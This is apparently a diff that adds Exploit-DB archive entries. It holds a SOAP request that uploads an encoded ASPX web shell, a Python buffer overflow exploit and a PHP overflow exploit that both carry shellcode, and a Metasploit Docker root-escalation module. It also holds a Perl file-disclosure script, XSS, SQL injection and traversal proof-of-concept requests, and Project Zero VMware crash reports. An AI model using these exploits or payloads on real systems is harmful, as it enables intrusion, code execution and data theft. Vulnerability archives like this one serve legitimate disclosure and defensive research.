<temporaryServerFilename>[path_to_MumGeoData]\Userdata\GDI\e41279bd-343d-48a1-a413-05e1b3c50f40\Bookmarks\Bookmarks.sod.tmp636008925231332626</temporaryServerFilename>
<data>eJyFk21P2zAQx9/nU5w8IbXalj4A29Qk1aANolJHK5qJaW+QkxwhW2JHtgNBE99956TdWEHsleN7/Pl/F//gM6x5hrDkIqvpI2CzNwzmGNdZwIyqkUGkeEL2G15ouh1MHZ+SFmUllYELXqKuWv/mQRss3XnOMyG1yRP9/+DFqovRicor8wQiIQhVC24CplHdoWJT507maQt7vZQ87cn4ByYGNIoU1TsI71CYE5VpwL7zy3l0tFG5yCBsktrgrEx7WwNXmQ1YK5mg1hvDlVmIGwmVziEAgfew7+r1PYe87lleoH0DhbGkTF1skHUe6luX1F9b1yAB9pa6dK5LTHNFoFRNpFylq9pUtaE4K24X8lXj5haLImzQspKv1drbMUJFpu2321L1KI2gNkYhLy+RkwKgTalSRZGV+28vbyeFpeuiXJsTyVCk9m1b26yQGu1doamVAO2Riq3o9Fhiu54VefJzX/ftJPfkv6RBS6HRvVK5wR7zK4VTRrX3HJt2uO65KYtQJDLF3t95mcYWdCNsTL//PJX5g13RR8cfdCtEu3QefVnaIzyZ02FyU+CU36MAritXoIF7jLWV2x90TkreBscyfQA6b6QqIU8DO2UGJZpbSZeKtvr5VvpUdmIZT2XT5nTYjJR+KGiTv79fXMzDbxMYDUceLMOzaAJHw+Oq8WC92iyixepiAjzWsqBnexCt1hMYD6tmvxNc5am5Ddj42Dqn/uBJ3y3FaW2MFB0E0h8oXqQY7yg+fHydYvTpBQrbMWDYDonBSrQ70Qr1Z0N2cB3Olm3JYyxatCIubJGX0A53aIej4esCjZ+jTWeyLGnvJ133tqGdrR2mPe1w21m3+/EbI5Kikw==</data>
<append>false</append>
<completed>true</completed>
</UploadFile>
</s:Body>
</s:Envelope>
The "data" node contains a base64-encoded, zlib-packed aspx web shell. It can be used to issue
arbitrary commands on the compromised host.
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:RelatesTo>
</s:Header>
<s:Body>
<UploadFileResponse>
<UploadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter/>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</UploadFileResult>
</UploadFileResponse>
</s:Body>
</s:Envelope>
## Base64 encoded Passwords
In the database file in \MumGeoData\System\System.db Passwords are stored in the tables "user" and
"connection". Both tables store their passwords in plain text with base64 encoding applied.
Example:
sqlite> select * from user where name='MUM';
<User GUID>|MUM|<base64 encoded password>|1||
## Remark about information disclosures
Observing the communication between a MapEdit Silverlight client and its backend server, various
information could be gathered, particularly file paths and license keys. Additionally the error
messages, that the server generates discloses quite a lot of information about the backend parsing
process.
## History
2016-06-07 Discovery of mentioned vulnerabilities
2016-06-09 First contact with MuM
2016-06-23 confirmation of mentioned vulnerabilities
2016-07-29 Release of version 6.2.74
2016-09-13 Public disclosure

58
platforms/linux/local/40392.py Executable file
View file

@ -0,0 +1,58 @@
# Exploit developed using Exploit Pack v6.01
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
# jsacco@exploitpack.com
# Program affected: EKG Gadu
# Affected value: USERNAME
# Version: 1:1.9~pre+r2855-3+b1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: console Gadu Gadu client for UNIX systems - ncurses UI
# EKG ("Eksperymentalny Klient Gadu-Gadu") is an open source
# Gadu-Gadu client for UNIX systems.
# Kali Linux 2.0 package: pool/main/e/ekg/ekg_1.9~pre+r2855-3+b1_i386.deb
# MD5sum: c752577dfb5ea44513a3fb351d431afa
# Website: http://ekg.chmurka.net/
#
# gdb$ run `python -c 'print "A"*258'`
# 0x0807e125 in strlcpy ()
# gdb$ backtrace
# #0 0x0807e125 in strlcpy ()
# #1 0x080570bb in ioctld_socket ()
# #2 0x08052e60 in main ()
import os, subprocess
def run():
try:
print "# EKG Gadu - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack -
http://exploitpack.com"
# NOPSLED + SHELLCODE + EIP
buffersize = 240
nopsled = "\x90"*30
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x20\xf1\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["ekg ",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, EKG Gadu - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit EKG Gadu - Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()

75
platforms/linux/local/40394.rb Executable file
View file

@ -0,0 +1,75 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info, {
'Name' => 'Docker Daemon Privilege Escalation',
'Description' => %q{
This module obtains root privileges from any host account with access to the
Docker daemon. Usually this includes accounts in the `docker` group.
},
'License' => MSF_LICENSE,
'Author' => ['forzoni'],
'DisclosureDate' => 'Jun 28 2016',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
'Targets' => [ ['Automatic', {}] ],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 60 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0
}
))
register_advanced_options([
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
], self.class)
end
def check
if cmd_exec('docker ps && echo true') == 'true'
print_error("Failed to access Docker daemon.")
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Vulnerable
end
end
def exploit
pl = generate_payload_exe
exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
print_status("Writing payload executable to '#{exe_path}'")
write_file(exe_path, pl)
register_file_for_cleanup(exe_path)
print_status("Executing script to create and run docker container")
vprint_status cmd_exec("chmod +x #{exe_path}")
vprint_status shell_script(exe_path)
vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")
print_status "Waiting #{datastore['WfsDelay']}s for payload"
end
def shell_script(exploit_path)
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
%Q{
IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
docker rmi -f $IMG
#{exploit_path}
}.strip.split("\n").map(&:strip).join(';')
end
end

23
platforms/php/webapps/40391.txt Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: WordPress Plugin Order Export Import for WooCommerce
# Link: https://wordpress.org/plugins/order-import-export-for-woocommerce/
# Version: 1.0.8
# Date: 19th 2016
# Exploit Author: contact ([a]) david-peltier ([d]) fr
# Vendor Homepage: xadapter.com
# Version: 1.0.8
# Timeline: Vuln found: 17-09-2016, reported to vendor: 18-09-2016, fix: 19-09-2016
### SUMMARY
WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store.
This attacks allows an attacker to export all order without being authenticated
### POC
http://server/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export
A .CSV with all orders will be downloaded
### FIX
The vendor fix this issue in 1.0.9

176
platforms/php/webapps/40395.txt Executable file
View file

@ -0,0 +1,176 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Kajona 4.7
Fixed in: 5.0
Fixed Version Link: https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Vendor Website: https://www.kajona.de/
Vulnerability Type: XSS & Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Kajona is an open source CMS written in PHP. In version 4.7, it is vulnerable
to multiple XSS attacks and limited directory traversal.
The XSS vulnerabilities are reflected as well as persistent, and can lead to
the stealing of cookies, injection of keyloggers, or the bypassing of CSRF
protection.
The directory traversal issue gives information about which files exist on a
system, and thus allows an attacker to gather information about a system.
3. Details
XSS 1: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The function that parses admin requests echoes user input into a JavaScript
context without escaping, leading to reflected XSS. As the injection takes
place into a JavaScript context, browser filters will generally not be able to
filter out an attack.
In the case of Kajona, XSS may lead to code execution, as admins can upload PHP
files via the media manager.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=search&action=search&peClose=1&peRefreshPage=';alert(1);foo='
Code:
core/module_system/system/class_request_dispatcher.php
$strReturn = "<html><head></head><body onload=\"parent.location = '" . urldecode(getGet("peRefreshPage")) . "';\"></body></html>";
XSS 2: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The media manager echoes the form_element parameter into a JavaScript context
without escaping, leading to reflected XSS. As the injection takes place into a
JavaScript context, browser filters will generally not be able to filter out an
attack. Note that a valid systemid id is required.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=mediamanager&action=folderContentFolderviewMode&systemid=[VALID_SYSTEM_ID]&form_element=']]);alert(1);KAJONA.admin.folderview.selectCallback([['#
Click on "Accept" overlay of an image to trigger the injected code.
XSS 3: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The "class_messageprovider_exceptions_enabled" parameter of the xml.php script
is vulnerable to reflected XSS.
Proof of Concept:
http://localhost/kajona/xml.php?admin=1&module=messaging&action=saveConfigAjax&systemid=&class_messageprovider_exceptions_enabled=false<a xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'><a%3abody onload%3d'alert(1)'%2f><%2fa>&messageprovidertype=class_messageprovider_exceptions
XSS 4: Persistent XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
When creating a comment, the subject is vulnerable to persistent XSS. The click
of an admin is required to execute the injected JavaScript code.
Proof of Concept:
1. Leave a comment:
http://localhost/kajona/index.php?page=postacomment
2. As subject, use:
');alert('1
3. Visit the comment overview:
http://localhost/kajona/index.php?admin=1&module=postacomment&action=list
4. Click edit on the comment
5. Click on "Edit Tags" (the second symbol from the right)
Directory Traversal
When viewing images, the file name is improperly sanitized, allowing for
directory traversal.
It is not possible to actually read out files, as there are additional checks
in place preventing that. But an unauthenticated attacker can still see which
files exist on a system and which do not, making it possible to collect
information for further attacks.
Proof of Concept:
GET /kajona/image.php?image=/files/images/upload/....//....//....//download.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 200 (but not shown)
GET /kajona/image.php?image=/files/images/upload/....//....//....//foobar.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 404
Code:
core/module_system/image.php
public function __construct() {
//find the params to use
$this->strFilename = urldecode(getGet("image"));
//avoid directory traversing
$this->strFilename = str_replace("../", "", $this->strFilename);
[...]
}
[...]
private function resizeImage() {
//Load the image-dimensions
if(is_file(_realpath_ . $this->strFilename) && (uniStrpos($this->strFilename, "/files") !== false || uniStrpos($this->strFilename, "/templates") !== false)) {
[...]
}
class_response_object::getInstance()->setStrStatusCode(class_http_statuscodes::SC_NOT_FOUND);
class_response_object::getInstance()->sendHeaders();
}
4. Solution
To mitigate this issue please upgrade at least to version 5.0:
https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Please note that a newer version might already be available.
5. Report Timeline
04/11/2016 Informed Vendor about Issue
04/13/2016 Vendor applies fix to github
05/25/2016 Vendor releases fixed version
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Kajona-47-XSS-amp-Directory-Traversal-163.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-StraAe 54
10365 Berlin, Germany

93
platforms/php/webapps/40396.txt Executable file
View file

@ -0,0 +1,93 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: MyBB 1.8.6
Fixed in: 1.8.7
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website: http://www.mybb.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a
second order SQL injection by an authenticated admin user, allowing the
extraction of data from the database.
3. Details
Description
CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P
The setting threadsperpage is vulnerable to second order error based SQL
injection. An admin account is needed to change this setting.
The injection takes place into a LIMIT clause, and the query also uses ORDER
BY, making an injection of UNION ALL not possible, but it is still possibly to
extract information.
Proof of Concept
Go to the settings page:
http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7
For Setting "threadsperpage" use:
20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Visit a forum to trigger injected code:
http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3
The result will be:
SQL Error:
1105 - XPATH syntax error: ':5.5.33-1'
Query:
SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON (u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky DESC, t.lastpost desc LIMIT 0, 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Code
forumdisplay.php
$perpage = $mybb->settings['threadsperpage'];
[...]
$query = $db->query("
SELECT t.*, {$ratingadd}t.username AS threadusername, u.username
FROM ".TABLE_PREFIX."threads t
LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid)
WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2
ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2
LIMIT $start, $perpage
");
4. Solution
To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

42
platforms/php/webapps/40401.txt Executable file
View file

@ -0,0 +1,42 @@
# Title: ZineBasic 1.1 Remote File Disclosure Exploit
# Author: bd0rk || East Germany former GDR
# Tested on: Ubuntu-Linux
# Vendor: http://w2scripts.com/news-publishing/
# Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master
# Twitter: twitter.com/bd0rk
#Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M
----------------------------------------------------------------------------------
=> Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12
=> Vulnerable snippet: $id = $_GET['id'];
----------------------------------------------------------------------------------
Exploitcode with little error inline 25-->'Gainst script-kiddies! || Copy&Paste:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
sub ex()
{
print "Usage: perl $0 someone.com /ZineBasic_Dir/\n";
print "\nZineBasic 1.1 Remote File Disclosure Exploit\n";
print "\ Contact: twitter.com/bd0rk\n";
($host, $path, $under, $file,) = @ARGV;
$under="/articleImg/";
$file="delImage.php?id=[REMOTE_FILE]";
my $target = "http://".$host.$path.$under.$file;
my $usrAgent = LWP::UserAgent->new();
my $request = $usrAgent->get($target,":content_file"=>"[REMOTE_FILE]");
if ($request->is_success)
{
print "$target <= JACKPOT!\n\n";
print "etc/passwd\n";
exit();
}
else
{
print "Exploit $target FAILED!\n[!].$request->status_line.\n";
exit();
}

59
platforms/windows/dos/40398.txt Executable file
View file

@ -0,0 +1,59 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=849
As already discussed in a number of reports in this tracker (#285, #286, #287, #288, #289, #292), VMware Workstation (current version 12.1.1 build-3770994) ships with a feature called "Virtual Printers", which enables the virtualized operating systems to access printers installed on the Host. Inside the VM, the communication takes place through a COM1 device, and the incoming data is handled by a dedicated "vprintproxy.exe" process on the Host, as launched by the "vmware-vmx.exe" service. Administrative privileges are not required to access COM1 in the guest, at least on Windows.
The vprintproxy.exe is a significant attack surface for potential VM escapes. Due to its nature, the application implements support for a variety of complex protocols and file formats, such as the printing protocol, EMFSPOOL format, and further embedded EMFs, fonts, images etc. This report addresses a bug in the handling of TrueType fonts embedded in EMFSPOOL, as implemented in the TPView.DLL library extensively used by vprintproxy.exe.
The version of the TPView.DLL file referenced in this report is 9.4.1045.1 (md5sum b6211e8b5c2883fa16231b0a6bf014f3).
TrueType fonts can be embedded in EMFSPOOL files via EMRI_ENGINE_FONT records. When such a record is encountered while processing the printing request data, some complex logic is executed to load the font into the program's internal structures. For reasons which are not fully clear to me, one of the operations is to copy the contents of the CMAP table into the NAME table in memory - or, if the latter is larger than the former, create a completely new NAME table with CMAP's data. This is generally implemented in a function located at address 0x1005C230, and the high-level logic is as follows:
--- cut ---
CMAP = FindCmapTableHeader();
CMAP_size = ExtractSize(CMAP);
CMAP_body = ExtractBody(CMAP);
NAME = FindNameTableHeader();
if (NAME) {
NAME_size = ExtractSize(NAME);
NAME_body = ExtractBody(NAME);
SetTableSize(NAME, CMAP_size);
memset(NAME_body, 0, NAME_size);
if (CMAP_size > NAME_size) {
SetTableOffset(NAME, font_size);
font_data = realloc(font_size + CMAP_size);
memset(&font_data[font_size], 0, CMAP_size);
memcpy(&font_data[font_size], CMAP_body, CMAP_size);
} else {
memcpy(NAME_body, CMAP_body, CMAP_size);
}
}
--- cut ---
As you can see, the function doesn't perform any bounds checking of the values (offsets, sizes) loaded from table headers. Some of the fields have already been verified before and are guaranteed to be valid at this point of execution, but some of them (such as CMAP_body or NAME_size) are still fully controlled. While controlling the pointer to the CMAP section data (relative to the start of the font buffer) may be useful, being able to cheat about the NAME table size enables an attacker to cause a much more dangerous memory corruption on the heap.
For example, if we set the NAME size to an enormous value (e.g. 0xAAAAAAAA), we will encounter an immediate crash in the memset() function, as shown below:
--- cut ---
(22f0.26ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ThinPrint\TPView.dll -
eax=01555540 ebx=00000000 ecx=215cefc0 edx=00000026 esi=215b87d4 edi=aaaaaaaa
eip=68102056 esp=2247f298 ebp=2247f2e8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
TPView!TPRenderW+0x1547f6:
68102056 660f7f4140 movdqa xmmword ptr [ecx+40h],xmm0 ds:002b:215cf000=????????????????????????????????
--- cut ---
If the NAME table size is increased by a smaller degree, such that the memset() call doesn't hit unmapped page boundary, the code may successfully finish the call and proceed to copying the contents of the CMAP section into the small NAME memory area, which would finally result in a typical heap-based buffer overflow condition with controlled length and data.
Attached is a Proof of Concept Python script, which connects to the COM1 serial port, and sends an EMFSPOOL structure containing a font file with the NAME table length set to 0xAAAAAAAA. When launched in a guest system, it should trigger the crash shown above in the vprintproxy.exe process on the host. The script is a slightly reworked version of Kostya's original exploit.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40398.zip

65
platforms/windows/dos/40399.txt Executable file
View file

@ -0,0 +1,65 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=850
As already discussed in a number of reports in this tracker (#285, #286, #287, #288, #289, #292), VMware Workstation (current version 12.1.1 build-3770994) ships with a feature called "Virtual Printers", which enables the virtualized operating systems to access printers installed on the Host. Inside the VM, the communication takes place through a COM1 device, and the incoming data is handled by a dedicated "vprintproxy.exe" process on the Host, as launched by the "vmware-vmx.exe" service. Administrative privileges are not required to access COM1 in the guest, at least on Windows.
The vprintproxy.exe is a significant attack surface for potential VM escapes. Due to its nature, the application implements support for a variety of complex protocols and file formats, such as the printing protocol, EMFSPOOL format, and further embedded EMFs, fonts, images etc. This report addresses a multitude of bugs in the handling of JPEG2000 images embedded in a custom record 0x8000 inside EMF, as implemented in the TPView.DLL library extensively used by vprintproxy.exe.
The version of the TPView.DLL file referenced in this report is 9.4.1045.1 (md5sum b6211e8b5c2883fa16231b0a6bf014f3).
The CTPViewDoc::WriteEMF function (adddress 0x100518F0) iterates over all EMF records found in the EMFSPOOL structure sent over COM1 for printing, and performs special handling of some of them. One such record is a custom type 0x8000, expected to store a JPEG2000 image wrapped in a structure similar to that of a EMF_STRETCHDIBITS record. The handler at 0x100516A0, and more specifically a further nested function at 0x1003C000 performs complete parsing of the J2K format, opening up the potential for software vulnerabilities. An example of a bug in that code area discovered in the past is a stack-based buffer overflow in the processing of record 0xff5c (Quantization Default), reported by Kostya Kortchinsky in bug #287.
Since the source code of the JPEG2000 implementation used by VMware is not publicly available, and the file format is sufficiently complex that a manual audit sounds like a dire and very ineffective option to find bugs, I have set up a fuzzing session to automate the process. As a result, with the PageHeap option enabled in Application Verifier for vprintproxy.exe, the fuzzer has managed to trigger hundreds of crashes, in a total of 39 unique code locations. Below is a list of different instructions which generated a crash, with a brief description of the underlying reason.
+----------------------------+-----------------------------------------------+
| Instruction | Reason |
+----------------------------+-----------------------------------------------+
| add [eax+edx*4], edi | Heap buffer overflow |
| cmp [eax+0x440], ebx | Heap out-of-bounds read |
| cmp [eax+0x8], esi | Heap out-of-bounds read |
| cmp [edi+0x70], ebx | Heap out-of-bounds read |
| cmp [edi], edx | Heap out-of-bounds read |
| cmp dword [eax+ebx*4], 0x0 | Heap out-of-bounds read |
| cmp dword [esi+eax*4], 0x0 | Heap out-of-bounds read |
| div dword [ebp-0x24] | Division by zero |
| div dword [ebp-0x28] | Division by zero |
| fld dword [edi] | NULL pointer dereference |
| idiv ebx | Division by zero |
| idiv edi | Division by zero |
| imul ebx, [edx+eax+0x468] | Heap out-of-bounds read |
| mov [eax-0x4], edx | Heap buffer overflow |
| mov [ebx+edx*8], eax | Heap buffer overflow |
| mov [ecx+edx], eax | Heap buffer overflow |
| mov al, [esi] | Heap out-of-bounds read |
| mov bx, [eax] | NULL pointer dereference |
| mov eax, [ecx] | NULL pointer dereference |
| mov eax, [edi+ecx+0x7c] | Heap out-of-bounds read |
| mov eax, [edx+0x7c] | Heap out-of-bounds read |
| movdqa [edi], xmm0 | Heap buffer overflow |
| movq mm0, [eax] | NULL pointer dereference |
| movq mm1, [ebx] | NULL pointer dereference |
| movq mm2, [edx] | NULL pointer dereference |
| movzx eax, byte [ecx-0x1] | Heap out-of-bounds read |
| movzx eax, byte [edx-0x1] | Heap out-of-bounds read |
| movzx ebx, byte [eax+ecx] | Heap out-of-bounds read |
| movzx ecx, byte [esi+0x1] | Heap out-of-bounds read |
| movzx ecx, byte [esi] | Heap out-of-bounds read |
| movzx edi, word [ecx] | NULL pointer dereference |
| movzx esi, word [edx] | NULL pointer dereference |
| push dword [ebp-0x8] | Stack overflow (deep / infinite recursion) |
| push ebp | Stack overflow (deep / infinite recursion) |
| push ebx | Stack overflow (deep / infinite recursion) |
| push ecx | Stack overflow (deep / infinite recursion) |
| push edi | Stack overflow (deep / infinite recursion) |
| push esi | Stack overflow (deep / infinite recursion) |
| rep movsd | Heap buffer overflow, Heap out-of-bounds read |
+----------------------------+-----------------------------------------------+
Considering the volume of the crashes, I don't have the resources to investigate the root cause of each of them, and potentially deduplicate the list even further. My gut feeling is that the entirety of the crashes may represent 10 or more different bugs in the code.
Attached is a Python script which can be used to test each particular JPEG2000 sample: it is responsible for wrapping it in the corresponding EMF + EMFSPOOL structures and sending to the COM1 serial port on the guest system. It is a reworked version of Kostya's original exploit from bug #287. In the same ZIP archive, you can also find up to three samples per each crash site listed above.
It was empirically confirmed that some of the heap corruptions can be leveraged to achieve arbitrary code execution, as when the Page Heap mechanism was disabled, the process would occasionally crash at invalid EIP or a CALL instruction referencing invalid memory addresses (vtables).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40399.zip

32
platforms/windows/local/40389.php Executable file
View file

@ -0,0 +1,32 @@
<?php
#############################################################################
## PHP 5.0.0 tidy_parse_file() Buffer Overflow Exploit
## Tested on Windows XP SP3 English
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 17/09/2016
## Buffer Overflow
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
$junk = str_repeat("A", 2036); # 2036 x A
$eip = "\xaf\xc6\x17\x10"; # 0x1017c6af call esp @ php5ts.dll
# windows/exec - 144 bytes, Encoder: x86/shikata_ga_nai, EXITFUNC=seh, CMD=calc
$shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1".
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30".
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa".
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96".
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b".
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a".
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83".
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98".
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61".
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05".
"\x7f\xe8\x7b\xca";
$buffer = $junk.$eip.$shellcode;
tidy_parse_file(1,$buffer,1,1);
#tidy_repair_file(1,$buffer,1,1);
?>

87
platforms/windows/local/40393.txt Executable file
View file

@ -0,0 +1,87 @@
Document Title:
================
SolarWinds Kiwi Syslog Server Unquoted Service Path Privilege Escalation Vulnerability
Author:
========
Halil Dalabasmaz
Release Date:
==============
29 SEP 2016
Product & Service Introduction:
================================
Kiwi Syslog® Server is an affordable, easy-to-use syslog server for IT
administrators and network teams. Easy to set up and configure, Kiwi Syslog
Server receives, logs, displays, alerts on, and forwards syslog, SNMP trap,
and Windows® event log messages from routers, switches, firewalls, Linux®
and UNIX® hosts, and Windows® machines.
Kiwi Syslog Server also includes log archive management features that allow
you to maintain compliance by securing, compressing, moving, and purging logs
exactly as specified in your log retention policy.
Vendor Homepage:
=================
http://www.kiwisyslog.com/products/kiwi-syslog-server/product-overview.aspx
Vulnerability Information:
===========================
The application can be install on Windows system as a service by default service
installation selected. The application a 32-bit application and the default
installation path is "C:\Program Files (x86)" on Windows systems. This could
potentially allow an authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. The application work on "Local System"
privileges. A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
C:\Windows\system32>sc qc "Kiwi Syslog Server"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Kiwi Syslog Server
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Syslogd\Syslogd_Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Kiwi Syslog Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Vulnerability Disclosure Timeline:
=========================
13 AUG 2016 - Contact With Vendor
15 AUG 2016 - Vendor Response
15 SEP 2016 - No Response From Vendor
19 SEP 2016 - Public Disclosure
Discovery Status:
==================
Published
Affected Product(s):
=====================
SolarWinds Kiwi Syslog Server 9.5.1
Tested On:
===========
Windows 7 Ultimate 64-Bit SP1 (EN)
Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
Domain: www.bgasecurity.com
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr
Copyright © 2016 | BGA Security LLC

92
platforms/windows/local/40400.txt Executable file
View file

@ -0,0 +1,92 @@
Document Title:
================
